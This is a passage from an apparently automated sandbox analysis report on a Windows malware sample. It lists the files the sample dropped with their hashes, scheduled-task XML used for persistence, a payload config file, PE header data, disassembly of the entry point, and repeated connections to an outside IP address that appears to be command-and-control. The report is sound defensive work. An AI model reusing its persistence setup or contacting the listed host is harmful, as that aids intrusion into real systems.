              SHA-256:3A413CDE1881BD4B2AEDE76034BAA94A00D40B6C7BDA18577636DCCBB7746CBA
              SHA-512:3E7C1ABFCE67624A2B25CE4BB95429E70C4408CBA9BF92828F12A5B42F404BCFF6BA416A98D3AE30C2F64348946BA46560BC06B5F2B1B40A92007DF3B195A634
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\vdpstja.bin
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):654
              Entropy (8bit):5.466159936178476
              Encrypted:false
              SSDEEP:
              MD5:1FC0F96F57264D51546177D2A6697CAF
              SHA1:0056139558090B064B303817343B3917DAEC225B
              SHA-256:32BB7294265BABD847D37D6D45F4DFFB60D3A9E12EA684417D2911A4380B8AA1
              SHA-512:87215809D30044A9D74E9B557DFDC1B3BC62DECA7C9B80BD0741C4849C951079C1FE2C525C7E2A9F70F2EB329BEA5B78CF2D6A5FA8425A64E075AFF88199D094
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\vmwepitk.ico
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):518
              Entropy (8bit):5.446951342718582
              Encrypted:false
              SSDEEP:
              MD5:3BC051ABDDADF20F44239A3F4D7729A2
              SHA1:85907AB13C191D6EA676205B2013FB4B2D76D700
              SHA-256:1A458064D0C494B97DBA9BA3B3B815D1E4457672AD982D234F4CCDE1A834087F
              SHA-512:939DCFA24EB6A42412BA2D2DA4158543CEC96CCDF010A09C739684805464604805AB6B145C573BDF3C0591D4CDBFB260363632AED9383AB17DF028DAD81614CF
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\vxnslrtcv.docx
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):595
              Entropy (8bit):5.498200602093174
              Encrypted:false
              SSDEEP:
              MD5:CE89B449E0BF13583FCF623DC39E4A3A
              SHA1:5AF6F11E0E2D583FDD0B8EF96BDB1AB5B8516FD7
              SHA-256:7D79C01E5A34AE5BB59F40F23BF1545EFD01760803551FFA744769FE9098FF34
              SHA-512:D99542FEFA2C5DE4EA1F0B290B462BE35E7BF161FB77F751E8FB25E5B95B74CFE01C72FC95EF08909974EF9053CE028FBCDEBED0DA4C123BF29D09C034FFC025
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\whgh.dll
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):563
              Entropy (8bit):5.410246118862809
              Encrypted:false
              SSDEEP:
              MD5:F9DCC92A013B1A4B704BD50130EDA877
              SHA1:629A854A96C2020E0C07D9EFF31B9F95BBB5DC6B
              SHA-256:C1E1AD8AF0A12CD3AAA7C9FB348FE0A5B98106C3044F2338CD3BC0830187B98F
              SHA-512:196773F45D02654198D0FBD22C384358B13C3536ADDA41CFB2A4D0B1B0664BC202BFA32F03F3AB6D894E931FF4B74CD58DF53197781C0BE6CFB1A53F141A61D1
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\xdotxo.docx
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):517
              Entropy (8bit):5.466351604074262
              Encrypted:false
              SSDEEP:
              MD5:49E7CBE3D9F1AC75C33159FFD823EB1E
              SHA1:CE297374AC9139763C4F42EDFCAA24148267681B
              SHA-256:323B5E48259C5E894A23BE28A5DEFCEA8A9DE7C09CAB11CD471B73A016408441
              SHA-512:68D14282E48C130284E2AF41E69BB99C0548CA2B93675FE450E6BAAC1EA1719C94F1E95FF78447FF5B4FB4E7C5C5E2867D9641F52C1465A2B7C9B9A18424BC39
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\xmjk.pif
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):776432
              Entropy (8bit):6.353910854155555
              Encrypted:false
              SSDEEP:
              MD5:279DAE7236F5F2488A4BACDE6027F730
              SHA1:29A012E5259739F24480CEDFD6D5F2D860CFCDB3
              SHA-256:415850F2706681A6D80708FCA8AC18DCF97E58B8F3FDC7BC4B558AB15FC0A03F
              SHA-512:B81276FC4D915A9721DAE15AA064781A1DBA665FF4864CCBDF624E8049C1B3C12A2B374F11CFFCF6E4A5217766836EDBC5F2376FFA8765F9070CBD87D7AE2FE8
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Metadefender, Detection: 37%
              • Antivirus: ReversingLabs, Detection: 56%
              Reputation:unknown
              C:\Users\user\31956653\xowesno.icm
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):630
              Entropy (8bit):5.469657756184613
              Encrypted:false
              SSDEEP:
              MD5:82A2AA44DA9BE298E7CA6F9B1BE37489
              SHA1:951CBE31A533D075F9981148061A5E39DF4D8ECF
              SHA-256:D1C0DB29168FBB45315E6897FD03B91C7B7D452C8B363BA17BA7D723A5C858EA
              SHA-512:9A1FB6140BF8B45197F295B2EAD678D02F957660A7DF4CE1F0F30E41EC07AE43331ADA081F0EDCAED1AA62AE8EE4CEB38ECE90A323432DD982467F3152D00D3F
              Malicious:false
              Reputation:unknown
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: Metadefender, Detection: 0%
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              C:\Users\user\AppData\Local\Temp\tmp7982.tmp
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1308
              Entropy (8bit):5.107159514403738
              Encrypted:false
              SSDEEP:
              MD5:211C08A48B92E556A855FB90EE4B0942
              SHA1:4E3ECFBEA0CCA0EE2743C0E23ED3FC79EB2E282A
              SHA-256:21F529F720EE77AD03AFD3CFA4CE04EBAF243C3E752F14C268529665CA936146
              SHA-512:B65C55C05249DFFFD0B52DF66DBA692CE21B6D447DEA43E93DACE718E40ABAC069A6BD2DC4CF0BC3F979A327BB7896BE6A3A36540916A33E0CDA8B974E2955F1
              Malicious:true
              Reputation:unknown
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:Non-ISO extended-ASCII text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:AC8BC54500409DC48009947C7192C04F
              SHA1:6929BE6CFA0169258B2870A14CA8E7F80CC3183B
              SHA-256:96A15B672AA0CA305E924C7EF126ED25863728FA7778B4558D3B29003DE0CD32
              SHA-512:31D6F483C75A42A4782386C00AABEFFC6A138E5C06ACAC1A63FA1CBA0507CB1A09627BC0B94C96162055160B6200BCAC49EF53BF092B7F3606238D7A2CA9CD13
              Malicious:true
              Reputation:unknown
              Preview: oc.R...H
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):45
              Entropy (8bit):4.4112044189276585
              Encrypted:false
              SSDEEP:
              MD5:4879007AC97C3DF41896D937852ABBE7
              SHA1:05A8C8638A4C8157216EF4AE24B43D3A4E750F00
              SHA-256:18B03E2D9F5F5E7E26686848D71049AC56D06500A2AB420A3A01CA0ED6C7AD18
              SHA-512:03C80EC22591301B32EB0310A188B1C4C24DC16BF9E2E25B22A95AA6E36E9B7002196B13A522F36D9AC64C38A98D6BA06C3387DBBE7CB3319E45BC43359A6C43
              Malicious:false
              Reputation:unknown
              Preview: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              C:\Users\user\temp\eblsq.ppt
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):80
              Entropy (8bit):4.988137789834391
              Encrypted:false
              SSDEEP:
              MD5:FE5D5426B0972408E1424ABC0F49F71B
              SHA1:A994F74A16522DAF1DDC270605C1B88979ABBCAD
              SHA-256:35A80327293D6268AA1C1FA881C3E84AF272B297672458C2CB3CACC41AFA691E
              SHA-512:2EB9191B629B025775F4CDA31F64FDC99A26E7A98AAAA94EC1C956AF719CE067A5545A0B0E37E178BDAD87734924C130B521EAB2E8FB23DC1952334660ACB6DB
              Malicious:false
              Reputation:unknown
              Preview: [S3tt!ng]..stpth=%userprofile%..Key=Chrome..Dir3ctory=31956653..ExE_c=xmjk.pif..
              \Device\ConDrv
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF, LF line terminators
              Category:dropped
              Size (bytes):215
              Entropy (8bit):4.911407397013505
              Encrypted:false
              SSDEEP:
              MD5:623152A30E4F18810EB8E046163DB399
              SHA1:5D640A976A0544E2DDA22E9DF362F455A05CFF2A
              SHA-256:4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
              SHA-512:1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
              Malicious:false
              Reputation:unknown
              Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.836743207281609
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:dAkJsQr7A9.exe
              File size:1103745
              MD5:b115228fe5e180f505c081aa829c1a86
              SHA1:c242c6a90ae569e55ed6acdb5c765244f623b9b6
              SHA256:a64c1b956bb79c5cfec594165a4ba37e9f695f8f83ec2b7bc2729d19c2598cd5
              SHA512:c7b49a9fdbd08e0eb219758c8d8b44bd0b43663d66053bc52068edfa6efaf70a809218995dda2eec5e2414e2dc96385236c991300293b617d1da022f02593620
              SSDEEP:24576:rAOcZEh2G8ydrzUcNV53O9QblBWTq6ai0bagi7vzJL:tBNlw2x+Qbl8Tq6d4a5vN

              File Icon

              Icon Hash:b491b4ecd336fb5b

              Static PE Info

              General

              Entrypoint:0x41e1f9
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

              Entrypoint Preview

              Instruction
              call 00007F8C409F645Fh
              jmp 00007F8C409F5E53h
              cmp ecx, dword ptr [0043D668h]
              jne 00007F8C409F5FC5h
              ret
              jmp 00007F8C409F65D5h
              ret
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00433068h
              mov dword ptr [ecx], 00434284h
              ret
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F8C409E93D1h
              mov dword ptr [esi], 00434290h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00434298h
              mov dword ptr [ecx], 00434290h
              ret
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00434278h
              push eax
              call 00007F8C409F916Dh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 00434278h
              push eax
              call 00007F8C409F9156h
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F8C409F5FCCh
              push 0000000Ch
              push esi
              call 00007F8C409F558Fh
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F8C409F5F2Eh
              push 0043A410h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F8C409F8855h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [EXP] VS2015 UPD3.1 build 24215
              • [LNK] VS2015 UPD3.1 build 24215
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213

              Data Directories

              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b540 | 0x34 | .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b574 | 0x3c | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x4c28 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x67000 | 0x210c | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x397d0 | 0x54 | .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34218 | 0x40 | .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_IAT | 0x32000 | 0x260 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3aaec | 0x120 | .rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

              Sections

              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x30581 | 0x30600 | False | 0.589268410853 | data | 6.70021125825 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata | 0x32000 | 0xa332 | 0xa400 | False | 0.455030487805 | data | 5.23888424127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x3d000 | 0x238b0 | 0x1200 | False | 0.368272569444 | data | 3.83993526939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .gfids | 0x61000 | 0xe8 | 0x200 | False | 0.333984375 | data | 2.12166381533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc | 0x62000 | 0x4c28 | 0x4e00 | False | 0.602263621795 | data | 6.36874241417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0x67000 | 0x210c | 0x2200 | False | 0.786534926471 | data | 6.61038519378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              Name | RVA | Size | Type | Language | Country
              PNG | 0x62524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
              PNG | 0x6306c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
              RT_ICON | 0x64618 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870
              RT_DIALOG | 0x64900 | 0x286 | data | English | United States
              RT_DIALOG | 0x64b88 | 0x13a | data | English | United States
              RT_DIALOG | 0x64cc4 | 0xec | data | English | United States
              RT_DIALOG | 0x64db0 | 0x12e | data | English | United States
              RT_DIALOG | 0x64ee0 | 0x338 | data | English | United States
              RT_DIALOG | 0x65218 | 0x252 | data | English | United States
              RT_STRING | 0x6546c | 0x1e2 | data | English | United States
              RT_STRING | 0x65650 | 0x1cc | data | English | United States
              RT_STRING | 0x6581c | 0x1b8 | data | English | United States
              RT_STRING | 0x659d4 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
              RT_STRING | 0x65b1c | 0x446 | data | English | United States
              RT_STRING | 0x65f64 | 0x166 | data | English | United States
              RT_STRING | 0x660cc | 0x152 | data | English | United States
              RT_STRING | 0x66220 | 0x10a | data | English | United States
              RT_STRING | 0x6632c | 0xbc | data | English | United States
              RT_STRING | 0x663e8 | 0xd6 | data | English | United States
              RT_GROUP_ICON | 0x664c0 | 0x14 | data
              RT_MANIFEST | 0x664d4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

              Imports

              DLL | Import
              KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

              Possible Origin

              Language of compilation system | Country where language is spoken
              English | United States

              Network Behavior

              Snort IDS Alerts

              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              10/12/21-12:35:17.105237 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 56527 | 8.8.8.8 | 192.168.2.3
              10/12/21-12:35:27.793788 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 63297 | 8.8.8.8 | 192.168.2.3
              10/12/21-12:35:49.817168 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50585 | 8.8.8.8 | 192.168.2.3

              Network Port Distribution

              TCP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Oct 12, 2021 12:35:50.514432907 CEST4981248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:50.539594889 CEST4856249812185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:51.045687914 CEST4981248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:51.073875904 CEST4856249812185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:55.140722036 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:55.210638046 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:55.718004942 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:55.749516964 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:56.249275923 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:56.273762941 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:00.404426098 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:00.417629957 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:00.921530008 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:00.955311060 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:01.468419075 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:01.512979984 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:05.582500935 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:05.613492966 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:06.129812956 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:06.141463041 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:06.659672022 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:06.671129942 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:10.689080954 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:10.754615068 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:11.265531063 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:11.284606934 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:11.790812016 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:11.821477890 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:15.837282896 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:15.860461950 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:16.369263887 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:16.389642000 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:16.908663988 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:16.933974028 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:21.962171078 CEST4984548562192.168.2.3185.19.85.175
